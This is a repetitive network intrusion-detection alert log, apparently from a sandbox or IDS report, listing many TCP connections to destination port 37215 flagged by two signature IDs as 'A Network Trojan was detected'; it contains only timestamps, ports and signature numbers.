          Timestamp:06/09/24-16:33:30.413978
          SID:2829579
          Source Port:38950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.302201
          SID:2829579
          Source Port:36080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.931273
          SID:2829579
          Source Port:33018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397360
          SID:2835222
          Source Port:39072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.073882
          SID:2829579
          Source Port:37102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.302272
          SID:2835222
          Source Port:46040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.036299
          SID:2835222
          Source Port:34108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.599468
          SID:2835222
          Source Port:40796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.080569
          SID:2829579
          Source Port:48426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.593614
          SID:2829579
          Source Port:51114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948228
          SID:2835222
          Source Port:47104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399851
          SID:2829579
          Source Port:33440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926337
          SID:2835222
          Source Port:54182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713793
          SID:2835222
          Source Port:45154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.465365
          SID:2835222
          Source Port:53490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.956196
          SID:2829579
          Source Port:42376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.166346
          SID:2835222
          Source Port:48462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289113
          SID:2835222
          Source Port:48860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.032915
          SID:2829579
          Source Port:34594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.983829
          SID:2835222
          Source Port:42842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102227
          SID:2829579
          Source Port:48738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538373
          SID:2835222
          Source Port:53442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.599825
          SID:2829579
          Source Port:44986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397217
          SID:2829579
          Source Port:38386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944813
          SID:2829579
          Source Port:36862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716259
          SID:2829579
          Source Port:56262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.599802
          SID:2835222
          Source Port:44770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719529
          SID:2835222
          Source Port:36542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.017902
          SID:2835222
          Source Port:37948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720868
          SID:2835222
          Source Port:33030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399559
          SID:2829579
          Source Port:37244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.249608
          SID:2835222
          Source Port:55462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718360
          SID:2835222
          Source Port:41144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399746
          SID:2835222
          Source Port:36722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.693891
          SID:2835222
          Source Port:44692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.399114
          SID:2829579
          Source Port:45482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.600967
          SID:2835222
          Source Port:50386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.564869
          SID:2829579
          Source Port:43510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.253085
          SID:2835222
          Source Port:54288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.694767
          SID:2835222
          Source Port:47394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.921099
          SID:2835222
          Source Port:39856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.157041
          SID:2829579
          Source Port:34668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472469
          SID:2835222
          Source Port:45104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104287
          SID:2829579
          Source Port:51496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.891042
          SID:2835222
          Source Port:34978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944341
          SID:2829579
          Source Port:58446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.908789
          SID:2835222
          Source Port:41348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720137
          SID:2835222
          Source Port:54750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.280987
          SID:2835222
          Source Port:46356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.285016
          SID:2829579
          Source Port:38694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.169527
          SID:2829579
          Source Port:47938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.667710
          SID:2835222
          Source Port:38262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.207972
          SID:2829579
          Source Port:45202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.475749
          SID:2835222
          Source Port:45244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929008
          SID:2835222
          Source Port:37882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284010
          SID:2835222
          Source Port:56280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.900356
          SID:2835222
          Source Port:35472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.658729
          SID:2835222
          Source Port:53508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539145
          SID:2835222
          Source Port:40238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539233
          SID:2835222
          Source Port:57624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947102
          SID:2829579
          Source Port:60450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821725
          SID:2829579
          Source Port:41612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.003641
          SID:2829579
          Source Port:43134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720056
          SID:2835222
          Source Port:53918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206436
          SID:2829579
          Source Port:53252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.993319
          SID:2829579
          Source Port:60756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.253203
          SID:2835222
          Source Port:34328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987505
          SID:2835222
          Source Port:45674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.667989
          SID:2829579
          Source Port:41858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.862559
          SID:2829579
          Source Port:53594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716476
          SID:2835222
          Source Port:38328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.075532
          SID:2835222
          Source Port:41264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034601
          SID:2835222
          Source Port:45362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.690073
          SID:2835222
          Source Port:41964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162045
          SID:2829579
          Source Port:46538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.286076
          SID:2829579
          Source Port:60768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.860410
          SID:2829579
          Source Port:42636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.474683
          SID:2829579
          Source Port:51708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.866034
          SID:2835222
          Source Port:50032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.274906
          SID:2829579
          Source Port:48610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077644
          SID:2835222
          Source Port:38736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.660735
          SID:2835222
          Source Port:49438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.598507
          SID:2829579
          Source Port:58148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223787
          SID:2829579
          Source Port:48412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.537827
          SID:2829579
          Source Port:55364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.684797
          SID:2829579
          Source Port:60492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.900158
          SID:2835222
          Source Port:44260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929374
          SID:2835222
          Source Port:45806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248192
          SID:2835222
          Source Port:56302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.290226
          SID:2835222
          Source Port:59028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.292185
          SID:2835222
          Source Port:41470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.285060
          SID:2829579
          Source Port:46178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946721
          SID:2835222
          Source Port:37890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415526
          SID:2835222
          Source Port:48176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.990100
          SID:2829579
          Source Port:54318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926117
          SID:2829579
          Source Port:34614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.595858
          SID:2829579
          Source Port:45584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.036161
          SID:2835222
          Source Port:52472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.130602
          SID:2829579
          Source Port:59368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077557
          SID:2829579
          Source Port:51654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718079
          SID:2835222
          Source Port:57282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.917092
          SID:2829579
          Source Port:34482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168302
          SID:2835222
          Source Port:36008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.667616
          SID:2835222
          Source Port:54472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.667807
          SID:2835222
          Source Port:38820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.667673
          SID:2835222
          Source Port:40688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819922
          SID:2835222
          Source Port:54978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.132008
          SID:2829579
          Source Port:56968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.993584
          SID:2835222
          Source Port:34254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948587
          SID:2835222
          Source Port:53172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397120
          SID:2829579
          Source Port:60086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223576
          SID:2835222
          Source Port:43062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.921875
          SID:2835222
          Source Port:49070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.604849
          SID:2835222
          Source Port:34770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.564411
          SID:2829579
          Source Port:35818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.283401
          SID:2829579
          Source Port:54964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103433
          SID:2835222
          Source Port:48238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.920104
          SID:2835222
          Source Port:40018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168282
          SID:2835222
          Source Port:59670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.466657
          SID:2835222
          Source Port:51528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.027918
          SID:2835222
          Source Port:50396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.597370
          SID:2835222
          Source Port:53496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.274381
          SID:2829579
          Source Port:35464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.284999
          SID:2835222
          Source Port:47978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.296896
          SID:2829579
          Source Port:51160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.598024
          SID:2835222
          Source Port:42046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.993396
          SID:2829579
          Source Port:52770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715056
          SID:2835222
          Source Port:54800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.132240
          SID:2835222
          Source Port:58344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721704
          SID:2829579
          Source Port:38574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.119917
          SID:2829579
          Source Port:34716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.559005
          SID:2829579
          Source Port:56330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399724
          SID:2829579
          Source Port:44786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869813
          SID:2835222
          Source Port:53876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.890469
          SID:2829579
          Source Port:42912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.079207
          SID:2829579
          Source Port:33538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.283841
          SID:2829579
          Source Port:48944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.904468
          SID:2835222
          Source Port:60052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867091
          SID:2835222
          Source Port:48718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.861367
          SID:2829579
          Source Port:37136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205520
          SID:2829579
          Source Port:58102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718152
          SID:2829579
          Source Port:43542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.253054
          SID:2835222
          Source Port:47610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.278991
          SID:2829579
          Source Port:57504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206516
          SID:2829579
          Source Port:35902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.120879
          SID:2829579
          Source Port:32796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102445
          SID:2829579
          Source Port:46760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947503
          SID:2829579
          Source Port:51942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.866233
          SID:2835222
          Source Port:36378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.041481
          SID:2829579
          Source Port:58616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033358
          SID:2829579
          Source Port:40440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033360
          SID:2835222
          Source Port:32804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415462
          SID:2835222
          Source Port:44120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.471373
          SID:2829579
          Source Port:55236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.951234
          SID:2835222
          Source Port:40006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.306361
          SID:2835222
          Source Port:44876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.567960
          SID:2829579
          Source Port:43690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.253339
          SID:2835222
          Source Port:52528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.076216
          SID:2835222
          Source Port:39108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714128
          SID:2829579
          Source Port:49330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.073597
          SID:2829579
          Source Port:41386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.677459
          SID:2835222
          Source Port:50518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.914137
          SID:2829579
          Source Port:51134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.294375
          SID:2835222
          Source Port:38866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248026
          SID:2829579
          Source Port:51998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.660281
          SID:2829579
          Source Port:44824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.031430
          SID:2835222
          Source Port:51802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.476500
          SID:2835222
          Source Port:47388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867310
          SID:2835222
          Source Port:44442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820379
          SID:2835222
          Source Port:38610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.905261
          SID:2829579
          Source Port:59164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.891222
          SID:2829579
          Source Port:45460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946555
          SID:2829579
          Source Port:58486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.285068
          SID:2835222
          Source Port:59708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.165759
          SID:2829579
          Source Port:54044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103515
          SID:2829579
          Source Port:53492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.478887
          SID:2835222
          Source Port:60886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718266
          SID:2835222
          Source Port:44968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823428
          SID:2829579
          Source Port:37228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080802
          SID:2829579
          Source Port:43458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248774
          SID:2835222
          Source Port:60308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205979
          SID:2835222
          Source Port:59128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.916048
          SID:2829579
          Source Port:41618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.027218
          SID:2829579
          Source Port:49520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.563191
          SID:2835222
          Source Port:34738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.595840
          SID:2835222
          Source Port:55322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928365
          SID:2829579
          Source Port:57088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988042
          SID:2835222
          Source Port:37296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.604884
          SID:2829579
          Source Port:46950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205312
          SID:2835222
          Source Port:44892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.288908
          SID:2829579
          Source Port:33386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820782
          SID:2835222
          Source Port:47914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.601766
          SID:2835222
          Source Port:47966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.992243
          SID:2835222
          Source Port:57718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038044
          SID:2835222
          Source Port:36718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.247407
          SID:2829579
          Source Port:43996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.600536
          SID:2829579
          Source Port:34948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.031828
